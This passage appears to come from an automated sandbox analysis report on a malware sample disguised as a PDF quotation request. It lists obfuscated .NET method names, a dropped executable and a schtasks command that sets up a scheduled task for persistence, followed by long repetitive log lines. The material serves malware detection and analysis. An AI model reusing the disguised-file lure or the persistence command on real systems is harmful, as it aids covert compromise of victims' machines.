Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, eE0OeLfchLaibRCm9J.cs	High entropy of concatenated method names: 'jVkkTJ0LKf', 'qsckwE9iLG', 'sX5kkVCx2Q', 'dbok9arVrO', 'EeEkJsy5WG', 'AVCk5IFU6h', 'Dispose', 'IrV4Rce8Kh', 'hpA40klOQw', 'RVL42KAPYB'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, q46R8vWWMsPtLpNDMd.cs	High entropy of concatenated method names: 'nqxwO8E4eu', 'iC8wFq1mWf', 'mDX41XALgH', 'frB4YRlfat', 'jfowqEA8JU', 'p4fwGE2sEW', 'P7AwDOUJRK', 'nWYw78vXTj', 'dFuwCPst5h', 'KkrwPVxN7a'
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, LkxJhvtSB97nX7bLlp.cs	High entropy of concatenated method names: 'aLKkaFLGxs', 'LWHkgWQdlA', 'xMXkXwX8eY', 'PpEkmHuBlV', 'zSekQX6tha', 'UnOkc7itXj', 'LeBkbiY7Ff', 'iL1kd4hE9n', 'E6WkVIc7HP', 'I3WkxWujC3'

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

File created: C:\Users\user\AppData\Roaming\bCirqu.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
